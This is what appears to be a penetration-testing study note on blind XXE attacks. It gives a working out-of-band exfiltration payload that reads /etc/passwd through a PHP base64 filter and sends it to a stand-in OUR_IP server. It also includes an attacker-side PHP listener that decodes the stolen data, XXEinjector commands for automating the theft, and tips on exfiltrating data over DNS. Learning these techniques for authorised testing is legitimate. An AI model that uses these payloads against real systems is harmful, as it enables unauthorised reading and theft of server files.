Recent Notes

See 81 more →

Blind Data Exfiltration

3 min read

These notes cover the concepts and techniques behind blind data exfiltration using XXE vulnerabilities when the target does not display any XML entity output or PHP errors.

1. Blind Data Exfiltration Overview

  • Blind XXE Vulnerability:
    • The web application is vulnerable to XXE, but does not show any output from the XML entities.
    • Direct methods (e.g., outputting file contents in the response) are ineffective.
  • Challenge:
    • No visible XML entity output or PHP runtime errors to leverage.
    • Requires an alternative method to retrieve sensitive file contents.

2. Out-of-Band (OOB) Data Exfiltration

  • Concept:

    • Force the vulnerable server to send the sensitive data to an attacker-controlled server.
    • This method is common for blind attacks (blind SQLi, blind command injection, blind XSS, etc.).

  • Approach:

    1. File Reading with PHP Filter:

      <!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

    2. OOB Entity Declaration:

      <!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

    3. Payload Assembly:

      <?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

      When processed, the server makes a request to your server like:

      http://OUR_IP:8000/?content=WFhFX1NBTVBMRV9EQVRB

      where WFhFX1NBTVBMRV9EQVRB is the base64 encoded data.

  • Server-Side Decoding:

    <?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

    Then start the PHP server:

    php -S 0.0.0.0:8000

3. Automated OOB Exfiltration with XXEinjector

  • Tool Overview:

    • XXEinjector automates blind XXE attacks including error-based, CDATA source exfiltration, and OOB XXE.

  • Setup Steps:

    1. Clone the Tool:

      git clone https://github.com/enjoiz/XXEinjector.git

    2. Prepare the Request File:

      • Capture the HTTP request (using Burp Suite) and save only the first XML line (up to the marker XXEINJECT) in a file (e.g., /tmp/xxe.req):

        POST /blind/submitDetails.php HTTP/1.1
Host: 10.129.201.94
...

<?xml version="1.0" encoding="UTF-8"?>

XXEINJECT

    3. Run the Tool:

      ruby XXEinjector.rb --host=[YOUR_IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter
      • Flags:
        • --host and --httpport: Your attack server details.
        • --file: The request file with the XML marker.
        • --path: File path to exfiltrate.
        • --oob=http: Use HTTP for out-of-band communication.
        • --phpfilter: Base64-encode the file content.

    4. Retrieving the Exfiltrated Data:

      • Exfiltrated files are stored under the tool’s Logs directory. For example:

        cat Logs/10.129.201.94/etc/passwd.log

4. Additional Tips

  • DNS OOB Exfiltration:

    • Instead of URL parameters, you can place the encoded data in a subdomain (e.g., ENCODED.our.website.com).
    • Tools like tcpdump can capture DNS queries to reconstruct the data.

  • Decoding the Data:

    echo "WFhFX1NBTVBMRV9EQVRB" | base64 -d

  • Practical Usage:

    • These techniques apply to blind XXE vulnerabilities where the application does not display any output.
    • They are often used in advanced penetration testing exercises and in real-world scenarios where direct feedback is not available.

Conclusion

  • Blind XXE requires creative methods (like OOB exfiltration) to retrieve data when direct output is not available.
  • OOB Techniques leverage external requests (HTTP/DNS) to send encoded file content to an attacker-controlled server.
  • Automation Tools such as XXEinjector help streamline and manage the exfiltration process.

Graph View